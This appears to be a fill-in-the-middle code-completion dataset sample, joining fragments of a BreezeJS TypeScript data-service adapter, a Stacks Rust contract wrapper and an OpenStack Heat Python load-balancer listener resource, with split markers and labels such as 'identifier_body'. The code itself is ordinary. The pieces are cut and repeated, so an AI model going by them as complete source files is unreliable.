success: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
let data = httpResponse.data;
if (data.Errors || data.errors) {
handleHttpError(reject, httpResponse);
} else {
let saveResult = adapter._prepareSaveResult(saveContext, data);
saveResult.httpResponse = httpResponse;
resolve(saveResult);
}
},
error: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
handleHttpError(reject, httpResponse);
}
});
});
return promise;
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
The return value from this method should be a serializable object that will be sent to the server after calling JSON.stringify on it.
*/
_prepareSaveBundle(saveContext: ISaveContext, saveBundle: ISaveBundle): any {
// The implementor should call _createChangeRequestInterceptor
throw new Error("Need a concrete implementation of _prepareSaveBundle");
}
/**
Returns a constructor function for a "ChangeRequestInterceptor"
that can tweak the saveBundle both as it is built and when it is completed
by a concrete DataServiceAdapater.
Initialized with a default, no-op implementation that developers can replace with a
substantive implementation that changes the individual entity change requests
or aspects of the entire 'saveBundle' without having to write their own DataService adapters.
> let adapter = breeze.config.getAdapterInstance('dataService');
> adapter.changeRequestInterceptor = function (saveContext, saveBundle) {
> this.getRequest = function (request, entity, index) {
> // alter the request that the adapter prepared for this entity
> // based on the entity, saveContext, and saveBundle
> // e.g., add a custom header or prune the originalValuesMap
> return request;
> };
> this.done = function (requests) {
> // alter the array of requests representing the entire change-set
> // based on the saveContext and saveBundle
> };
> }
@param saveContext - The BreezeJS "context" for the save operation.
@param saveBundle - Contains the array of entities-to-be-saved (AKA, the entity change-set).
@return Constructor for a "ChangeRequestInterceptor".
**/
changeRequestInterceptor: IChangeRequestInterceptorCtor = DefaultChangeRequestInterceptor;
/** @hidden @internal */
_createChangeRequestInterceptor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter!;
let cri = adapter.changeRequestInterceptor;
let isFn = core.isFunction;
if (isFn(cri)) {
let pre = adapter.name + " DataServiceAdapter's ChangeRequestInterceptor";
let post = " is missing or not a function.";
let interceptor = new cri(saveContext, saveBundle);
if (!isFn(interceptor.getRequest)) {
throw new Error(pre + '.getRequest' + post);
}
if (!isFn(interceptor.done)) {
throw new Error(pre + '.done' + post);
}
return interceptor;
} else {
return new DefaultChangeRequestInterceptor(saveContext, saveBundle) as IChangeRequestInterceptor;
}
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter sublclass.
This method needs to take the result returned the server and convert it into an ISaveResult.
*/
_prepareSaveResult(saveContext: ISaveContext, data: any): ISaveResult {
throw new Error("Need a concrete implementation of _prepareSaveResult");
}
/** Utility method that may be used in any concrete DataServiceAdapter sublclass to handle any
http connection issues.
*/
// Put this at the bottom of your http error analysis
static _catchNoConnectionError(err: IServerError) {
if (err.status === 0 && err.message == null) {
err.message = "HTTP response status 0 and no message. " +
"Likely did not or could not reach server. Is the server running?";
}
}
jsonResultsAdapter = new JsonResultsAdapter({
name: "noop",
visitNode: function (/* node, mappingContext, nodeContext */) {
return {};
}
});
}
function handleHttpError(reject: (reason?: any) => void, httpResponse: IHttpResponse, messagePrefix?: string) {
let err = createError(httpResponse);
AbstractDataServiceAdapter._catchNoConnectionError(err);
if (messagePrefix) {
err.message = messagePrefix + "; " + err.message;
}
reject(err);
}
function createError(httpResponse: IHttpResponse) {
let err = new Error() as IServerError;
err.httpResponse = httpResponse;
err.status = httpResponse.status;
let errObj = httpResponse.data;
if (!errObj) {
err.message = httpResponse.error && httpResponse.error.toString();
return err;
}
// some ajax providers will convert errant result into an object ( angular), others will not (jQuery)
// if not do it here.
if (typeof errObj === "string") {
try {
errObj = JSON.parse(errObj);
} catch (e) {
| nstructor() | identifier_name |
abstract-data-service-adapter.ts | impl?: any;
/** The name of this adapter. */
name: string;
/** The [[IAjaxAdapter]] used by this [[IDataServiceAdapter]]. */
ajaxImpl: IAjaxAdapter;
constructor() {
}
// TODO use interface
checkForRecomposition(interfaceInitializedArgs: any) {
if (interfaceInitializedArgs.interfaceName === "ajax" && interfaceInitializedArgs.isDefault) {
this.initialize();
}
}
initialize() {
this.ajaxImpl = config.getAdapterInstance<IAjaxAdapter>("ajax") !;
// don't cache 'ajax' because then we would need to ".bind" it, and don't want to because of brower support issues.
if (this.ajaxImpl && this.ajaxImpl.ajax) {
return;
}
throw new Error("Unable to find ajax adapter for dataservice adapter '" + (this.name || '') + "'.");
}
fetchMetadata(metadataStore: MetadataStore, dataService: DataService) {
let serviceName = dataService.serviceName;
let url = dataService.qualifyUrl("Metadata");
let promise = new Promise((resolve, reject) => {
this.ajaxImpl.ajax({
type: "GET",
url: url,
dataType: 'json',
success: (httpResponse: IHttpResponse) => {
// might have been fetched by another query
if (metadataStore.hasMetadataFor(serviceName)) {
return resolve("already fetched");
}
let data = httpResponse.data;
let metadata: any;
try {
metadata = typeof (data) === "string" ? JSON.parse(data) : data;
metadataStore.importMetadata(metadata);
} catch (e) {
let errMsg = "Unable to either parse or import metadata: " + e.message;
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url + ". " + errMsg);
}
// import may have brought in the service.
if (!metadataStore.hasMetadataFor(serviceName)) {
metadataStore.addDataService(dataService);
}
resolve(metadata);
},
error: (httpResponse: IHttpResponse) => {
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url); | });
return promise;
}
executeQuery(mappingContext: MappingContext) {
mappingContext.adapter = this;
let promise = new Promise<IQueryResult>((resolve, reject) => {
let url = mappingContext.getUrl();
let params = {
type: "GET",
url: url,
params: (mappingContext.query as EntityQuery).parameters,
dataType: 'json',
success: function (httpResponse: IHttpResponse) {
let data = httpResponse.data;
try {
let rData: IQueryResult;
let results = data && (data.results || data.Results);
if (results) {
rData = { results: results, inlineCount: data.inlineCount || data.InlineCount,
httpResponse: httpResponse, query: mappingContext.query };
} else {
rData = { results: data, httpResponse: httpResponse, query: mappingContext.query };
}
resolve(rData);
} catch (e) {
if (e instanceof Error) {
reject(e);
} else {
handleHttpError(reject, httpResponse);
}
}
},
error: function (httpResponse: IHttpResponse) {
handleHttpError(reject, httpResponse);
},
crossDomain: false
};
if (mappingContext.dataService.useJsonp) {
params.dataType = 'jsonp';
params.crossDomain = true;
}
this.ajaxImpl.ajax(params);
});
return promise;
}
saveChanges(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter = this;
let saveBundleSer = adapter._prepareSaveBundle(saveContext, saveBundle);
let bundle = JSON.stringify(saveBundleSer);
let url = saveContext.dataService.qualifyUrl(saveContext.resourceName);
let promise = new Promise<ISaveResult>((resolve, reject) => {
this.ajaxImpl.ajax({
type: "POST",
url: url,
dataType: 'json',
contentType: "application/json",
data: bundle,
success: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
let data = httpResponse.data;
if (data.Errors || data.errors) {
handleHttpError(reject, httpResponse);
} else {
let saveResult = adapter._prepareSaveResult(saveContext, data);
saveResult.httpResponse = httpResponse;
resolve(saveResult);
}
},
error: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
handleHttpError(reject, httpResponse);
}
});
});
return promise;
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
The return value from this method should be a serializable object that will be sent to the server after calling JSON.stringify on it.
*/
_prepareSaveBundle(saveContext: ISaveContext, saveBundle: ISaveBundle): any {
// The implementor should call _createChangeRequestInterceptor
throw new Error("Need a concrete implementation of _prepareSaveBundle");
}
/**
Returns a constructor function for a "ChangeRequestInterceptor"
that can tweak the saveBundle both as it is built and when it is completed
by a concrete DataServiceAdapater.
Initialized with a default, no-op implementation that developers can replace with a
substantive implementation that changes the individual entity change requests
or aspects of the entire 'saveBundle' without having to write their own DataService adapters.
> let adapter = breeze.config.getAdapterInstance('dataService');
> adapter.changeRequestInterceptor = function (saveContext, saveBundle) {
> this.getRequest = function (request, entity, index) {
> // alter the request that the adapter prepared for this entity
> // based on the entity, saveContext, and saveBundle
> // e.g., add a custom header or prune the originalValuesMap
> return request;
> };
> this.done = function (requests) {
> // alter the array of requests representing the entire change-set
> // based on the saveContext and saveBundle
> };
> }
@param saveContext - The BreezeJS "context" for the save operation.
@param saveBundle - Contains the array of entities-to-be-saved (AKA, the entity change-set).
@return Constructor for a "ChangeRequestInterceptor".
**/
changeRequestInterceptor: IChangeRequestInterceptorCtor = DefaultChangeRequestInterceptor;
/** @hidden @internal */
_createChangeRequestInterceptor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter!;
let cri = adapter.changeRequestInterceptor;
let isFn = core.isFunction;
if (isFn(cri)) {
let pre = adapter.name + " DataServiceAdapter's ChangeRequestInterceptor";
let post = " is missing or not a function.";
let interceptor = new cri(saveContext, saveBundle);
if (!isFn(interceptor.getRequest)) {
throw new Error(pre + '.getRequest' + post);
}
if (!isFn(interceptor.done)) {
throw new Error(pre + '.done' + post);
}
return interceptor;
} else {
return new DefaultChangeRequestInterceptor(saveContext, saveBundle) as IChangeRequestInterceptor;
}
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter sublclass.
This method needs to take the result returned the server and convert it into an ISaveResult.
*/
_prepareSaveResult(saveContext: ISaveContext, data: any): ISaveResult {
throw new Error("Need a concrete implementation of _prepareSaveResult");
}
/** Utility method that may be used in any concrete DataServiceAdapter sublclass to handle any
http connection issues.
*/
// Put this at the bottom of your http error analysis
static _catchNoConnectionError(err: IServerError) {
if (err.status === 0 && err.message == null) {
err.message = "HTTP response status 0 and no message. " +
"Likely did not or could not reach server. Is the server running?";
}
}
jsonResultsAdapter = new JsonResultsAdapter({
name: "noop",
visitNode: function (/* node, mappingContext, nodeContext */) {
return {};
}
});
}
function handleHttpError(reject: (reason?: any) => void, httpResponse: IHttpResponse, messagePrefix?: string) {
let err = createError(httpResponse);
AbstractDataServiceAdapter._catchNoConnectionError(err);
if (messagePrefix) {
err.message = messagePrefix + "; " + err.message;
}
reject(err);
}
function createError(httpResponse: IHttpResponse) {
let err = new Error() as IServerError;
err.httpResponse = httpResponse;
err.status = httpResponse.status;
let errObj = httpResponse.data;
if (!errObj) {
err.message = httpResponse.error && httpResponse.error.toString();
return err;
}
// some ajax providers will convert errant result into an object ( angular), others will not (jQuery)
// if not do it here.
if (typeof errObj === "string") {
try {
errObj = JSON.parse(errObj);
} catch (e) {
| }
}); | random_line_split |
abstract-data-service-adapter.ts | (dataService);
}
resolve(metadata);
},
error: (httpResponse: IHttpResponse) => {
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url);
}
});
});
return promise;
}
executeQuery(mappingContext: MappingContext) {
mappingContext.adapter = this;
let promise = new Promise<IQueryResult>((resolve, reject) => {
let url = mappingContext.getUrl();
let params = {
type: "GET",
url: url,
params: (mappingContext.query as EntityQuery).parameters,
dataType: 'json',
success: function (httpResponse: IHttpResponse) {
let data = httpResponse.data;
try {
let rData: IQueryResult;
let results = data && (data.results || data.Results);
if (results) {
rData = { results: results, inlineCount: data.inlineCount || data.InlineCount,
httpResponse: httpResponse, query: mappingContext.query };
} else {
rData = { results: data, httpResponse: httpResponse, query: mappingContext.query };
}
resolve(rData);
} catch (e) {
if (e instanceof Error) {
reject(e);
} else {
handleHttpError(reject, httpResponse);
}
}
},
error: function (httpResponse: IHttpResponse) {
handleHttpError(reject, httpResponse);
},
crossDomain: false
};
if (mappingContext.dataService.useJsonp) {
params.dataType = 'jsonp';
params.crossDomain = true;
}
this.ajaxImpl.ajax(params);
});
return promise;
}
saveChanges(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter = this;
let saveBundleSer = adapter._prepareSaveBundle(saveContext, saveBundle);
let bundle = JSON.stringify(saveBundleSer);
let url = saveContext.dataService.qualifyUrl(saveContext.resourceName);
let promise = new Promise<ISaveResult>((resolve, reject) => {
this.ajaxImpl.ajax({
type: "POST",
url: url,
dataType: 'json',
contentType: "application/json",
data: bundle,
success: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
let data = httpResponse.data;
if (data.Errors || data.errors) {
handleHttpError(reject, httpResponse);
} else {
let saveResult = adapter._prepareSaveResult(saveContext, data);
saveResult.httpResponse = httpResponse;
resolve(saveResult);
}
},
error: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
handleHttpError(reject, httpResponse);
}
});
});
return promise;
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
The return value from this method should be a serializable object that will be sent to the server after calling JSON.stringify on it.
*/
_prepareSaveBundle(saveContext: ISaveContext, saveBundle: ISaveBundle): any {
// The implementor should call _createChangeRequestInterceptor
throw new Error("Need a concrete implementation of _prepareSaveBundle");
}
/**
Returns a constructor function for a "ChangeRequestInterceptor"
that can tweak the saveBundle both as it is built and when it is completed
by a concrete DataServiceAdapater.
Initialized with a default, no-op implementation that developers can replace with a
substantive implementation that changes the individual entity change requests
or aspects of the entire 'saveBundle' without having to write their own DataService adapters.
> let adapter = breeze.config.getAdapterInstance('dataService');
> adapter.changeRequestInterceptor = function (saveContext, saveBundle) {
> this.getRequest = function (request, entity, index) {
> // alter the request that the adapter prepared for this entity
> // based on the entity, saveContext, and saveBundle
> // e.g., add a custom header or prune the originalValuesMap
> return request;
> };
> this.done = function (requests) {
> // alter the array of requests representing the entire change-set
> // based on the saveContext and saveBundle
> };
> }
@param saveContext - The BreezeJS "context" for the save operation.
@param saveBundle - Contains the array of entities-to-be-saved (AKA, the entity change-set).
@return Constructor for a "ChangeRequestInterceptor".
**/
changeRequestInterceptor: IChangeRequestInterceptorCtor = DefaultChangeRequestInterceptor;
/** @hidden @internal */
_createChangeRequestInterceptor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter!;
let cri = adapter.changeRequestInterceptor;
let isFn = core.isFunction;
if (isFn(cri)) {
let pre = adapter.name + " DataServiceAdapter's ChangeRequestInterceptor";
let post = " is missing or not a function.";
let interceptor = new cri(saveContext, saveBundle);
if (!isFn(interceptor.getRequest)) {
throw new Error(pre + '.getRequest' + post);
}
if (!isFn(interceptor.done)) {
throw new Error(pre + '.done' + post);
}
return interceptor;
} else {
return new DefaultChangeRequestInterceptor(saveContext, saveBundle) as IChangeRequestInterceptor;
}
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter sublclass.
This method needs to take the result returned the server and convert it into an ISaveResult.
*/
_prepareSaveResult(saveContext: ISaveContext, data: any): ISaveResult {
throw new Error("Need a concrete implementation of _prepareSaveResult");
}
/** Utility method that may be used in any concrete DataServiceAdapter sublclass to handle any
http connection issues.
*/
// Put this at the bottom of your http error analysis
static _catchNoConnectionError(err: IServerError) {
if (err.status === 0 && err.message == null) {
err.message = "HTTP response status 0 and no message. " +
"Likely did not or could not reach server. Is the server running?";
}
}
jsonResultsAdapter = new JsonResultsAdapter({
name: "noop",
visitNode: function (/* node, mappingContext, nodeContext */) {
return {};
}
});
}
function handleHttpError(reject: (reason?: any) => void, httpResponse: IHttpResponse, messagePrefix?: string) {
let err = createError(httpResponse);
AbstractDataServiceAdapter._catchNoConnectionError(err);
if (messagePrefix) {
err.message = messagePrefix + "; " + err.message;
}
reject(err);
}
function createError(httpResponse: IHttpResponse) {
let err = new Error() as IServerError;
err.httpResponse = httpResponse;
err.status = httpResponse.status;
let errObj = httpResponse.data;
if (!errObj) {
err.message = httpResponse.error && httpResponse.error.toString();
return err;
}
// some ajax providers will convert errant result into an object ( angular), others will not (jQuery)
// if not do it here.
if (typeof errObj === "string") {
try {
errObj = JSON.parse(errObj);
} catch (e) {
// sometimes httpResponse.data is just the error message itself
err.message = errObj;
return err;
}
}
let saveContext = httpResponse.saveContext;
// if any of the follow properties exist the source is .NET
let tmp = errObj.Message || errObj.ExceptionMessage || errObj.EntityErrors || errObj.Errors;
let isDotNet = !!tmp;
let message: string, entityErrors: any[];
if (!isDotNet) {
message = errObj.message;
entityErrors = errObj.errors || errObj.entityErrors;
} else {
let tmp = errObj;
do {
// .NET exceptions can provide both ExceptionMessage and Message but ExceptionMethod if it
// exists has a more detailed message.
message = tmp.ExceptionMessage || tmp.Message;
tmp = tmp.InnerException;
} while (tmp);
// .EntityErrors will only occur as a result of an EntityErrorsException being deliberately thrown on the server
entityErrors = errObj.Errors || errObj.EntityErrors;
entityErrors = entityErrors && entityErrors.map(function (e) {
return {
errorName: e.ErrorName,
entityTypeName: MetadataStore.normalizeTypeName(e.EntityTypeName),
keyValues: e.KeyValues,
propertyName: e.PropertyName,
errorMessage: e.ErrorMessage
};
});
}
if (saveContext && entityErrors) {
let propNameFn = saveContext.entityManager.metadataStore.namingConvention.serverPropertyNameToClient;
entityErrors.forEach(function (e) {
e.propertyName = e.propertyName && propNameFn(e.propertyName);
});
(err as ISaveErrorFromServer).entityErrors = entityErrors;
}
err.message = message || "Server side errors encountered - see the entityErrors collection on this object for more detail";
return err;
}
/** This is a default, no-op implementation that developers can replace. */
class DefaultChangeRequestInterceptor {
constructor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
|
}
| identifier_body |
|
abstract-data-service-adapter.ts | ?: any;
/** The name of this adapter. */
name: string;
/** The [[IAjaxAdapter]] used by this [[IDataServiceAdapter]]. */
ajaxImpl: IAjaxAdapter;
constructor() {
}
// TODO use interface
checkForRecomposition(interfaceInitializedArgs: any) {
if (interfaceInitializedArgs.interfaceName === "ajax" && interfaceInitializedArgs.isDefault) {
this.initialize();
}
}
initialize() {
this.ajaxImpl = config.getAdapterInstance<IAjaxAdapter>("ajax") !;
// don't cache 'ajax' because then we would need to ".bind" it, and don't want to because of brower support issues.
if (this.ajaxImpl && this.ajaxImpl.ajax) {
return;
}
throw new Error("Unable to find ajax adapter for dataservice adapter '" + (this.name || '') + "'.");
}
fetchMetadata(metadataStore: MetadataStore, dataService: DataService) {
let serviceName = dataService.serviceName;
let url = dataService.qualifyUrl("Metadata");
let promise = new Promise((resolve, reject) => {
this.ajaxImpl.ajax({
type: "GET",
url: url,
dataType: 'json',
success: (httpResponse: IHttpResponse) => {
// might have been fetched by another query
if (metadataStore.hasMetadataFor(serviceName)) {
return resolve("already fetched");
}
let data = httpResponse.data;
let metadata: any;
try {
metadata = typeof (data) === "string" ? JSON.parse(data) : data;
metadataStore.importMetadata(metadata);
} catch (e) {
let errMsg = "Unable to either parse or import metadata: " + e.message;
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url + ". " + errMsg);
}
// import may have brought in the service.
if (!metadataStore.hasMetadataFor(serviceName)) {
metadataStore.addDataService(dataService);
}
resolve(metadata);
},
error: (httpResponse: IHttpResponse) => {
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url);
}
});
});
return promise;
}
executeQuery(mappingContext: MappingContext) {
mappingContext.adapter = this;
let promise = new Promise<IQueryResult>((resolve, reject) => {
let url = mappingContext.getUrl();
let params = {
type: "GET",
url: url,
params: (mappingContext.query as EntityQuery).parameters,
dataType: 'json',
success: function (httpResponse: IHttpResponse) {
let data = httpResponse.data;
try {
let rData: IQueryResult;
let results = data && (data.results || data.Results);
if (results) {
rData = { results: results, inlineCount: data.inlineCount || data.InlineCount,
httpResponse: httpResponse, query: mappingContext.query };
} else {
rData = { results: data, httpResponse: httpResponse, query: mappingContext.query };
}
resolve(rData);
} catch (e) {
if (e instanceof Error) {
reject(e);
} else {
handleHttpError(reject, httpResponse);
}
}
},
error: function (httpResponse: IHttpResponse) {
handleHttpError(reject, httpResponse);
},
crossDomain: false
};
if (mappingContext.dataService.useJsonp) {
params.dataType = 'jsonp';
params.crossDomain = true;
}
this.ajaxImpl.ajax(params);
});
return promise;
}
saveChanges(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter = this;
let saveBundleSer = adapter._prepareSaveBundle(saveContext, saveBundle);
let bundle = JSON.stringify(saveBundleSer);
let url = saveContext.dataService.qualifyUrl(saveContext.resourceName);
let promise = new Promise<ISaveResult>((resolve, reject) => {
this.ajaxImpl.ajax({
type: "POST",
url: url,
dataType: 'json',
contentType: "application/json",
data: bundle,
success: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
let data = httpResponse.data;
if (data.Errors || data.errors) {
handleHttpError(reject, httpResponse);
} else {
let saveResult = adapter._prepareSaveResult(saveContext, data);
saveResult.httpResponse = httpResponse;
resolve(saveResult);
}
},
error: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
handleHttpError(reject, httpResponse);
}
});
});
return promise;
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
The return value from this method should be a serializable object that will be sent to the server after calling JSON.stringify on it.
*/
_prepareSaveBundle(saveContext: ISaveContext, saveBundle: ISaveBundle): any {
// The implementor should call _createChangeRequestInterceptor
throw new Error("Need a concrete implementation of _prepareSaveBundle");
}
/**
Returns a constructor function for a "ChangeRequestInterceptor"
that can tweak the saveBundle both as it is built and when it is completed
by a concrete DataServiceAdapater.
Initialized with a default, no-op implementation that developers can replace with a
substantive implementation that changes the individual entity change requests
or aspects of the entire 'saveBundle' without having to write their own DataService adapters.
> let adapter = breeze.config.getAdapterInstance('dataService');
> adapter.changeRequestInterceptor = function (saveContext, saveBundle) {
> this.getRequest = function (request, entity, index) {
> // alter the request that the adapter prepared for this entity
> // based on the entity, saveContext, and saveBundle
> // e.g., add a custom header or prune the originalValuesMap
> return request;
> };
> this.done = function (requests) {
> // alter the array of requests representing the entire change-set
> // based on the saveContext and saveBundle
> };
> }
@param saveContext - The BreezeJS "context" for the save operation.
@param saveBundle - Contains the array of entities-to-be-saved (AKA, the entity change-set).
@return Constructor for a "ChangeRequestInterceptor".
**/
changeRequestInterceptor: IChangeRequestInterceptorCtor = DefaultChangeRequestInterceptor;
/** @hidden @internal */
_createChangeRequestInterceptor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter!;
let cri = adapter.changeRequestInterceptor;
let isFn = core.isFunction;
if (isFn(cri)) {
let pre = adapter.name + " DataServiceAdapter's ChangeRequestInterceptor";
let post = " is missing or not a function.";
let interceptor = new cri(saveContext, saveBundle);
if (!isFn(interceptor.getRequest)) {
throw new Error(pre + '.getRequest' + post);
}
if (!isFn(interceptor.done)) {
| return interceptor;
} else {
return new DefaultChangeRequestInterceptor(saveContext, saveBundle) as IChangeRequestInterceptor;
}
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter sublclass.
This method needs to take the result returned the server and convert it into an ISaveResult.
*/
_prepareSaveResult(saveContext: ISaveContext, data: any): ISaveResult {
throw new Error("Need a concrete implementation of _prepareSaveResult");
}
/** Utility method that may be used in any concrete DataServiceAdapter sublclass to handle any
http connection issues.
*/
// Put this at the bottom of your http error analysis
static _catchNoConnectionError(err: IServerError) {
if (err.status === 0 && err.message == null) {
err.message = "HTTP response status 0 and no message. " +
"Likely did not or could not reach server. Is the server running?";
}
}
jsonResultsAdapter = new JsonResultsAdapter({
name: "noop",
visitNode: function (/* node, mappingContext, nodeContext */) {
return {};
}
});
}
function handleHttpError(reject: (reason?: any) => void, httpResponse: IHttpResponse, messagePrefix?: string) {
let err = createError(httpResponse);
AbstractDataServiceAdapter._catchNoConnectionError(err);
if (messagePrefix) {
err.message = messagePrefix + "; " + err.message;
}
reject(err);
}
function createError(httpResponse: IHttpResponse) {
let err = new Error() as IServerError;
err.httpResponse = httpResponse;
err.status = httpResponse.status;
let errObj = httpResponse.data;
if (!errObj) {
err.message = httpResponse.error && httpResponse.error.toString();
return err;
}
// some ajax providers will convert errant result into an object ( angular), others will not (jQuery)
// if not do it here.
if (typeof errObj === "string") {
try {
errObj = JSON.parse(errObj);
} catch (e) {
| throw new Error(pre + '.done' + post);
}
| conditional_block |
contracts.rs | // Copyright (C) 2013-2020 Blockstack PBC, a public benefit corporation
// Copyright (C) 2020 Stacks Open Internet Foundation
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or | // (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <http://www.gnu.org/licenses/>.
use std::convert::TryInto;
use vm::ast::ContractAST;
use vm::callables::CallableType;
use vm::contexts::{ContractContext, Environment, GlobalContext, LocalContext};
use vm::errors::InterpreterResult as Result;
use vm::representations::SymbolicExpression;
use vm::types::QualifiedContractIdentifier;
use vm::{apply, eval_all, Value};
#[derive(Serialize, Deserialize)]
pub struct Contract {
pub contract_context: ContractContext,
}
// AARON: this is an increasingly useless wrapper around a ContractContext struct.
// will probably be removed soon.
impl Contract {
pub fn initialize_from_ast(
contract_identifier: QualifiedContractIdentifier,
contract: &ContractAST,
global_context: &mut GlobalContext,
) -> Result<Contract> {
let mut contract_context = ContractContext::new(contract_identifier);
eval_all(&contract.expressions, &mut contract_context, global_context)?;
Ok(Contract {
contract_context: contract_context,
})
}
} | random_line_split |
|
contracts.rs | // Copyright (C) 2013-2020 Blockstack PBC, a public benefit corporation
// Copyright (C) 2020 Stacks Open Internet Foundation
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <http://www.gnu.org/licenses/>.
use std::convert::TryInto;
use vm::ast::ContractAST;
use vm::callables::CallableType;
use vm::contexts::{ContractContext, Environment, GlobalContext, LocalContext};
use vm::errors::InterpreterResult as Result;
use vm::representations::SymbolicExpression;
use vm::types::QualifiedContractIdentifier;
use vm::{apply, eval_all, Value};
#[derive(Serialize, Deserialize)]
pub struct | {
pub contract_context: ContractContext,
}
// AARON: this is an increasingly useless wrapper around a ContractContext struct.
// will probably be removed soon.
impl Contract {
pub fn initialize_from_ast(
contract_identifier: QualifiedContractIdentifier,
contract: &ContractAST,
global_context: &mut GlobalContext,
) -> Result<Contract> {
let mut contract_context = ContractContext::new(contract_identifier);
eval_all(&contract.expressions, &mut contract_context, global_context)?;
Ok(Contract {
contract_context: contract_context,
})
}
}
| Contract | identifier_name |
listener.py | #
# Copyright 2015 IBM Corp.
#
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
from heat.engine import translation
class Listener(neutron.NeutronResource):
"""A resource for managing LBaaS v2 Listeners.
This resource creates and manages Neutron LBaaS v2 Listeners,
which represent a listening endpoint for the vip.
"""
support_status = support.SupportStatus(version='6.0.0')
required_service_extension = 'lbaasv2'
PROPERTIES = (
PROTOCOL_PORT, PROTOCOL, LOADBALANCER, NAME,
ADMIN_STATE_UP, DESCRIPTION, DEFAULT_TLS_CONTAINER_REF,
SNI_CONTAINER_REFS, CONNECTION_LIMIT, TENANT_ID
) = (
'protocol_port', 'protocol', 'loadbalancer', 'name',
'admin_state_up', 'description', 'default_tls_container_ref',
'sni_container_refs', 'connection_limit', 'tenant_id'
)
PROTOCOLS = (
TCP, HTTP, HTTPS, TERMINATED_HTTPS,
) = (
'TCP', 'HTTP', 'HTTPS', 'TERMINATED_HTTPS',
)
ATTRIBUTES = (
LOADBALANCERS_ATTR, DEFAULT_POOL_ID_ATTR
) = (
'loadbalancers', 'default_pool_id'
)
properties_schema = {
PROTOCOL_PORT: properties.Schema(
properties.Schema.INTEGER,
_('TCP or UDP port on which to listen for client traffic.'),
required=True,
constraints=[
constraints.Range(1, 65535),
]
),
PROTOCOL: properties.Schema(
properties.Schema.STRING,
_('Protocol on which to listen for the client traffic.'),
required=True,
constraints=[
constraints.AllowedValues(PROTOCOLS),
]
),
LOADBALANCER: properties.Schema(
properties.Schema.STRING,
_('ID or name of the load balancer with which listener '
'is associated.'),
required=True,
constraints=[
constraints.CustomConstraint('neutron.lbaas.loadbalancer')
]
),
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of this listener.'),
update_allowed=True
),
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('The administrative state of this listener.'),
update_allowed=True,
default=True
),
DESCRIPTION: properties.Schema(
properties.Schema.STRING,
_('Description of this listener.'),
update_allowed=True,
default=''
),
DEFAULT_TLS_CONTAINER_REF: properties.Schema(
properties.Schema.STRING,
_('Default TLS container reference to retrieve TLS '
'information.'),
update_allowed=True
),
SNI_CONTAINER_REFS: properties.Schema(
properties.Schema.LIST,
_('List of TLS container references for SNI.'),
update_allowed=True
),
CONNECTION_LIMIT: properties.Schema(
properties.Schema.INTEGER,
_('The maximum number of connections permitted for this '
'load balancer. Defaults to -1, which is infinite.'),
update_allowed=True,
default=-1,
constraints=[
constraints.Range(min=-1),
]
),
TENANT_ID: properties.Schema(
properties.Schema.STRING,
_('The ID of the tenant who owns the listener.')
),
}
attributes_schema = {
LOADBALANCERS_ATTR: attributes.Schema(
_('ID of the load balancer this listener is associated to.'),
type=attributes.Schema.LIST
),
DEFAULT_POOL_ID_ATTR: attributes.Schema(
_('ID of the default pool this listener is associated to.'),
type=attributes.Schema.STRING
)
}
def translation_rules(self, props):
return [
translation.TranslationRule(
props,
translation.TranslationRule.RESOLVE,
[self.LOADBALANCER],
